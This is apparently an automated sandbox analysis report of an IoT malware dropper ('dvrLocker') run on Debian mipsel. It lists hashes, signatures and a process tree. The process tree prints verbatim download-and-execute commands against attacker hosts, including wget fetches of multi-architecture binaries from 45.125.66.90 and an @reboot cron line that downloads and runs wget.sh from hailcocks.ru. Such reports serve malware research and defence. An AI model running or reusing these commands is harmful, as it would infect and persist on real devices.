Analysis

- max time kernel: 150s
- max time network: 140s
- platform: debian-9_mipsel
- resource: debian9-mipsel-20240226-en
- resource tags: arch:mipsel, image:debian9-mipsel-20240226-en, kernel:4.9.0-13-4kc-malta, locale:en-us, os:debian-9-mipsel, system
- submitted: 27/11/2024, 02:39

Tasks

- Static task: static1
- Behavioral task behavioral1: sample 6b9b184965b98407c98536a87cb0b8272ccc28713f80531b5c5221b2630fac3b.unknown, resource ubuntu1804-amd64-20240611-en
- Behavioral task behavioral2: sample 6b9b184965b98407c98536a87cb0b8272ccc28713f80531b5c5221b2630fac3b.unknown, resource debian9-armhf-20240729-en
- Behavioral task behavioral3: sample 6b9b184965b98407c98536a87cb0b8272ccc28713f80531b5c5221b2630fac3b.unknown, resource debian9-mipsbe-20240418-en
- Behavioral task behavioral4: sample 6b9b184965b98407c98536a87cb0b8272ccc28713f80531b5c5221b2630fac3b.unknown, resource debian9-mipsel-20240226-en
General

- Target: 6b9b184965b98407c98536a87cb0b8272ccc28713f80531b5c5221b2630fac3b.unknown
- Size: 913B
- MD5: c18ef2271ad912c7542293151373ffa0
- SHA1: 65fb65c17671657fc431173051fe794c6c63007d
- SHA256: 6b9b184965b98407c98536a87cb0b8272ccc28713f80531b5c5221b2630fac3b
- SHA512: fb9a3ec37ee5f8f71b343285f034a6c27520fdc6525b217b411023b4c9741282cd36354442853caa50a2d2fe54dfb6e8f8453f36cdd773573435062f82bcdfc9
Malware Config
Signatures

- File and Directory Permissions Modification (1 TTP, 21 IoCs)
  Adversaries may modify file or directory permissions to evade defenses.
  PID / process: 858 chmod, 875 chmod, 895 chmod, 903 chmod, 927 chmod, 862 chmod, 870 chmod, 879 chmod, 911 chmod, 915 chmod, 919 chmod, 851 chmod, 866 chmod, 887 chmod, 891 chmod, 923 chmod, 821 chmod, 823 sh, 883 chmod, 899 chmod, 907 chmod
- Executes dropped EXE (7 IoCs)
  IoC / PID / process: /tmp/lib/dvrLocker 822 dvrLocker, /tmp/lib/dvrLocker 838 dvrLocker, /tmp/lib/dvrLocker 852 dvrLocker, /tmp/lib/dvrLocker 859 dvrLocker, /tmp/lib/dvrLocker 863 dvrLocker, /tmp/lib/dvrLocker 867 dvrLocker, /tmp/lib/dvrLocker 871 dvrLocker
- Renames itself (1 IoC)
  PID / process: 822 dvrLocker
- Unexpected DNS network traffic destination (1 IoC)
  Network traffic to other servers than the configured DNS servers was detected on the DNS port.
  Destination IP: 217.160.70.42
- Creates/modifies Cron job (1 TTP, 1 IoC)
  Cron allows running tasks on a schedule, and is commonly used for malware persistence.
  File opened for modification: /var/spool/cron/crontabs/tmp.Uw0tZs (process: crontab)
- Changes its process name (1 IoC)
  Changes the process name, possibly in an attempt to hide itself: /bin/busybox ntpd (PID 822, process: dvrLocker)
- System Network Configuration Discovery (1 TTP, 4 IoCs)
  Adversaries may gather information about the network configuration of a system.
  PID / process: 878 wget, 881 rm, 906 wget, 909 rm
- Writes file to tmp directory (1 IoC)
  Malware often drops required files in the /tmp directory.
  File opened for modification: /tmp/lib/dvrLocker (process: 6b9b184965b98407c98536a87cb0b8272ccc28713f80531b5c5221b2630fac3b.unknown)
Processes

Each entry gives PID, executable and command line; signatures triggered by that process follow in brackets. Indentation shows the parent/child depth of the process tree.

- PID 710: /tmp/6b9b184965b98407c98536a87cb0b8272ccc28713f80531b5c5221b2630fac3b.unknown, cmdline /tmp/6b9b184965b98407c98536a87cb0b8272ccc28713f80531b5c5221b2630fac3b.unknown [Writes file to tmp directory]
  - PID 713: /bin/ls, cmdline ls -l /proc/1/exe
  - PID 718: /bin/ls, cmdline ls -l /proc/10/exe
  - PID 721: /bin/ls, cmdline ls -l /proc/105/exe
  - PID 724: /bin/ls, cmdline ls -l /proc/11/exe
  - PID 727: /bin/ls, cmdline ls -l /proc/114/exe [Reads runtime system information]
  - PID 731: /bin/ls, cmdline ls -l /proc/115/exe
  - PID 734: /bin/ls, cmdline ls -l /proc/12/exe [Reads runtime system information]
  - PID 737: /bin/ls, cmdline ls -l /proc/13/exe [Reads runtime system information]
  - PID 738: /bin/ls, cmdline ls -l /proc/14/exe [Reads runtime system information]
  - PID 740: /bin/ls, cmdline ls -l /proc/143/exe [Reads runtime system information]
  - PID 742: /bin/ls, cmdline ls -l /proc/148/exe
  - PID 743: /bin/ls, cmdline ls -l /proc/15/exe
  - PID 745: /bin/ls, cmdline ls -l /proc/16/exe
  - PID 748: /bin/ls, cmdline ls -l /proc/164/exe
  - PID 749: /bin/ls, cmdline ls -l /proc/17/exe
  - PID 751: /bin/ls, cmdline ls -l /proc/18/exe [Reads runtime system information]
  - PID 752: /bin/ls, cmdline ls -l /proc/19/exe
  - PID 753: /bin/ls, cmdline ls -l /proc/2/exe
  - PID 755: /bin/ls, cmdline ls -l /proc/20/exe [Reads runtime system information]
  - PID 756: /bin/ls, cmdline ls -l /proc/21/exe [Reads runtime system information]
  - PID 757: /bin/ls, cmdline ls -l /proc/22/exe [Reads runtime system information]
  - PID 758: /bin/ls, cmdline ls -l /proc/23/exe [Reads runtime system information]
  - PID 759: /bin/ls, cmdline ls -l /proc/24/exe [Reads runtime system information]
  - PID 760: /bin/ls, cmdline ls -l /proc/245/exe [Reads runtime system information]
  - PID 761: /bin/ls, cmdline ls -l /proc/3/exe
  - PID 762: /bin/ls, cmdline ls -l /proc/320/exe
  - PID 763: /bin/ls, cmdline ls -l /proc/336/exe
  - PID 764: /bin/ls, cmdline ls -l /proc/340/exe [Reads runtime system information]
  - PID 765: /bin/ls, cmdline ls -l /proc/36/exe [Reads runtime system information]
  - PID 766: /bin/ls, cmdline ls -l /proc/365/exe
  - PID 767: /bin/ls, cmdline ls -l /proc/366/exe
  - PID 768: /bin/ls, cmdline ls -l /proc/367/exe
  - PID 769: /bin/ls, cmdline ls -l /proc/37/exe
  - PID 770: /bin/ls, cmdline ls -l /proc/385/exe [Reads runtime system information]
  - PID 771: /bin/ls, cmdline ls -l /proc/386/exe
  - PID 772: /bin/ls, cmdline ls -l /proc/395/exe
  - PID 773: /bin/ls, cmdline ls -l /proc/4/exe
  - PID 774: /bin/ls, cmdline ls -l /proc/402/exe [Reads runtime system information]
  - PID 775: /bin/ls, cmdline ls -l /proc/484/exe
  - PID 776: /bin/ls, cmdline ls -l /proc/497/exe
  - PID 777: /bin/ls, cmdline ls -l /proc/5/exe
  - PID 778: /bin/ls, cmdline ls -l /proc/526/exe [Reads runtime system information]
  - PID 779: /bin/ls, cmdline ls -l /proc/527/exe
  - PID 780: /bin/ls, cmdline ls -l /proc/6/exe
  - PID 781: /bin/ls, cmdline ls -l /proc/688/exe
  - PID 782: /bin/ls, cmdline ls -l /proc/69/exe
  - PID 783: /bin/ls, cmdline ls -l /proc/7/exe [Reads runtime system information]
  - PID 784: /bin/ls, cmdline ls -l /proc/70/exe
  - PID 785: /bin/ls, cmdline ls -l /proc/702/exe [Reads runtime system information]
  - PID 786: /bin/ls, cmdline ls -l /proc/703/exe
  - PID 787: /bin/ls, cmdline ls -l /proc/705/exe
  - PID 788: /bin/ls, cmdline ls -l /proc/707/exe
  - PID 789: /bin/ls, cmdline ls -l /proc/708/exe
  - PID 790: /bin/ls, cmdline ls -l /proc/709/exe
  - PID 791: /bin/ls, cmdline ls -l /proc/71/exe
  - PID 792: /bin/ls, cmdline ls -l /proc/710/exe
  - PID 793: /bin/ls, cmdline ls -l /proc/711/exe
  - PID 794: /bin/ls, cmdline ls -l /proc/712/exe
  - PID 795: /bin/ls, cmdline ls -l /proc/72/exe [Reads runtime system information]
  - PID 796: /bin/ls, cmdline ls -l /proc/73/exe
  - PID 797: /bin/ls, cmdline ls -l /proc/74/exe
  - PID 798: /bin/ls, cmdline ls -l /proc/76/exe
  - PID 801: /bin/ls, cmdline ls -l /proc/77/exe
  - PID 802: /bin/ls, cmdline ls -l /proc/79/exe
  - PID 804: /bin/ls, cmdline ls -l /proc/8/exe [Reads runtime system information]
  - PID 806: /bin/ls, cmdline ls -l /proc/80/exe
  - PID 808: /bin/ls, cmdline ls -l /proc/82/exe
  - PID 810: /bin/ls, cmdline ls -l /proc/9/exe [Reads runtime system information]
  - PID 811: /bin/rm, cmdline rm -rf /tmp/lib/
  - PID 813: /bin/rm, cmdline rm -rf /tmp/lib/dvrLocker
  - PID 815: /bin/mkdir, cmdline mkdir /tmp/lib/ [Reads runtime system information]
  - PID 816: /usr/bin/wget, cmdline wget http://45.125.66.90/mpsl -O -
  - PID 821: /bin/chmod, cmdline chmod 777 dvrLocker [File and Directory Permissions Modification]
  - PID 822: /tmp/lib/dvrLocker, cmdline ./dvrLocker tplink.new [Executes dropped EXE; Renames itself; Changes its process name; Reads runtime system information]
    - PID 823: /bin/sh, cmdline sh -c "(crontab -l ; echo \"@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh\") | crontab -" [File and Directory Permissions Modification]
      - PID 826: /usr/bin/crontab, cmdline crontab - [Creates/modifies Cron job; Reads runtime system information]
      - PID 827: /usr/bin/crontab, cmdline crontab -l [Reads runtime system information]
  - PID 835: /bin/rm, cmdline rm -rf mpsl
  - PID 838: /tmp/lib/dvrLocker, cmdline ./dvrLocker tplink.new [Executes dropped EXE]
  - PID 843: /usr/bin/wget, cmdline wget http://45.125.66.90/arm -O -
  - PID 851: /bin/chmod, cmdline chmod 777 dvrLocker [File and Directory Permissions Modification]
  - PID 852: /tmp/lib/dvrLocker, cmdline ./dvrLocker tplink.new [Executes dropped EXE]
  - PID 856: /bin/rm, cmdline rm -rf arm
  - PID 857: /usr/bin/wget, cmdline wget http://45.125.66.90/arm5 -O -
  - PID 858: /bin/chmod, cmdline chmod 777 dvrLocker [File and Directory Permissions Modification]
  - PID 859: /tmp/lib/dvrLocker, cmdline ./dvrLocker tplink.new [Executes dropped EXE]
  - PID 860: /bin/rm, cmdline rm -rf arm5
  - PID 861: /usr/bin/wget, cmdline wget http://45.125.66.90/ppc -O -
  - PID 862: /bin/chmod, cmdline chmod 777 dvrLocker [File and Directory Permissions Modification]
  - PID 863: /tmp/lib/dvrLocker, cmdline ./dvrLocker tplink.new [Executes dropped EXE]
  - PID 864: /bin/rm, cmdline rm -rf ppc
  - PID 865: /usr/bin/wget, cmdline wget http://45.125.66.90/arm7 -O -
  - PID 866: /bin/chmod, cmdline chmod 777 dvrLocker [File and Directory Permissions Modification]
  - PID 867: /tmp/lib/dvrLocker, cmdline ./dvrLocker tplink.new [Executes dropped EXE]
  - PID 868: /bin/rm, cmdline rm -rf arm7
  - PID 869: /usr/bin/wget, cmdline wget http://45.125.66.90/arm6 -O -
  - PID 870: /bin/chmod, cmdline chmod 777 dvrLocker [File and Directory Permissions Modification]
  - PID 871: /tmp/lib/dvrLocker, cmdline ./dvrLocker tplink.new [Executes dropped EXE]
  - PID 872: /bin/rm, cmdline rm -rf arm6
  - PID 873: /bin/rm, cmdline rm -rf /mnt/dvrLocker
  - PID 874: /usr/bin/wget, cmdline wget http://45.125.66.90/mpsl -O -
  - PID 875: /bin/chmod, cmdline chmod 777 dvrLocker [File and Directory Permissions Modification]
  - PID 876: /mnt/dvrLocker, cmdline ./dvrLocker tplink.new
  - PID 877: /bin/rm, cmdline rm -rf mpsl
  - PID 878: /usr/bin/wget, cmdline wget http://45.125.66.90/mips -O - [System Network Configuration Discovery]
  - PID 879: /bin/chmod, cmdline chmod 777 dvrLocker [File and Directory Permissions Modification]
  - PID 880: /mnt/dvrLocker, cmdline ./dvrLocker tplink.new
  - PID 881: /bin/rm, cmdline rm -rf mips [System Network Configuration Discovery]
  - PID 882: /usr/bin/wget, cmdline wget http://45.125.66.90/arm -O -
  - PID 883: /bin/chmod, cmdline chmod 777 dvrLocker [File and Directory Permissions Modification]
  - PID 884: /mnt/dvrLocker, cmdline ./dvrLocker tplink.new
  - PID 885: /bin/rm, cmdline rm -rf arm
  - PID 886: /usr/bin/wget, cmdline wget http://45.125.66.90/arm5 -O -
  - PID 887: /bin/chmod, cmdline chmod 777 dvrLocker [File and Directory Permissions Modification]
  - PID 888: /mnt/dvrLocker, cmdline ./dvrLocker tplink.new
  - PID 889: /bin/rm, cmdline rm -rf arm5
  - PID 890: /usr/bin/wget, cmdline wget http://45.125.66.90/ppc -O -
  - PID 891: /bin/chmod, cmdline chmod 777 dvrLocker [File and Directory Permissions Modification]
  - PID 892: /mnt/dvrLocker, cmdline ./dvrLocker tplink.new
  - PID 893: /bin/rm, cmdline rm -rf ppc
  - PID 894: /usr/bin/wget, cmdline wget http://45.125.66.90/arm7 -O -
  - PID 895: /bin/chmod, cmdline chmod 777 dvrLocker [File and Directory Permissions Modification]
  - PID 896: /mnt/dvrLocker, cmdline ./dvrLocker tplink.new
  - PID 898: /usr/bin/wget, cmdline wget http://45.125.66.90/arm6 -O -
  - PID 899: /bin/chmod, cmdline chmod 777 dvrLocker [File and Directory Permissions Modification]
  - PID 900: /mnt/dvrLocker, cmdline ./dvrLocker tplink.new
  - PID 901: /bin/rm, cmdline rm -rf arm6
  - PID 902: /usr/bin/wget, cmdline wget http://45.125.66.90/mpsl -O -
  - PID 903: /bin/chmod, cmdline chmod 777 dvrLocker [File and Directory Permissions Modification]
  - PID 904: /mnt/dvrLocker, cmdline ./dvrLocker tplink.new
  - PID 905: /bin/rm, cmdline rm -rf mpsl
  - PID 906: /usr/bin/wget, cmdline wget http://45.125.66.90/mips -O - [System Network Configuration Discovery]
  - PID 907: /bin/chmod, cmdline chmod 777 dvrLocker [File and Directory Permissions Modification]
  - PID 908: /mnt/dvrLocker, cmdline ./dvrLocker tplink.new
  - PID 909: /bin/rm, cmdline rm -rf mips [System Network Configuration Discovery]
  - PID 910: /usr/bin/wget, cmdline wget http://45.125.66.90/arm -O -
  - PID 911: /bin/chmod, cmdline chmod 777 dvrLocker [File and Directory Permissions Modification]
  - PID 912: /mnt/dvrLocker, cmdline ./dvrLocker tplink.new
  - PID 913: /bin/rm, cmdline rm -rf arm
  - PID 914: /usr/bin/wget, cmdline wget http://45.125.66.90/arm5 -O -
  - PID 915: /bin/chmod, cmdline chmod 777 dvrLocker [File and Directory Permissions Modification]
  - PID 916: /mnt/dvrLocker, cmdline ./dvrLocker tplink.new
  - PID 917: /bin/rm, cmdline rm -rf arm5
  - PID 918: /usr/bin/wget, cmdline wget http://45.125.66.90/ppc -O -
  - PID 919: /bin/chmod, cmdline chmod 777 dvrLocker [File and Directory Permissions Modification]
  - PID 920: /mnt/dvrLocker, cmdline ./dvrLocker tplink.new
  - PID 921: /bin/rm, cmdline rm -rf ppc
  - PID 922: /usr/bin/wget, cmdline wget http://45.125.66.90/arm7 -O -
  - PID 923: /bin/chmod, cmdline chmod 777 dvrLocker [File and Directory Permissions Modification]
  - PID 924: /mnt/dvrLocker, cmdline ./dvrLocker tplink.new
  - PID 925: /bin/rm, cmdline rm -rf arm7
  - PID 926: /usr/bin/wget, cmdline wget http://45.125.66.90/arm6 -O -
  - PID 927: /bin/chmod, cmdline chmod 777 dvrLocker [File and Directory Permissions Modification]
  - PID 928: /mnt/dvrLocker, cmdline ./dvrLocker tplink.new
  - PID 929: /bin/rm, cmdline rm -rf arm6
-
Network
MITRE ATT&CK Enterprise v15
Downloads

- File 1
  Filesize: 100KB
  MD5: 4ad582d49f505bfab7de84881998685b
  SHA1: 5f09f4baed114b594729ded91e2c4d263f0e2754
  SHA256: b1e8713db49c15b272baa11e5569ecb4f22fd6064f5aa59ed236d0af58f159a1
  SHA512: 6f35bfb8aca5fd02f6e690fe0628595531dba7463265b1a66ff801c7744690f3317f611ab07e45fdfc28a17a32a891de92b1d026de30bf327aa304395b0905f4
- File 2
  Filesize: 306B
  MD5: 2fbaf9a94577da61ead6786557355f03
  SHA1: 09a7a8bb07b2e052e230744a7a2dfff6a649776b
  SHA256: f6a6bc7ee3507b8c07807574731ad14c35195252608a2223e5885e772f9bf4c1
  SHA512: a45c2cb4da881374a691023c8f27caa273f27ab1a533d67191a5f4cee4ef19d41f4c01084e9dfbcd5c086e9d7f2fc237f7d8d33242a84d387459bd13dcd16ba3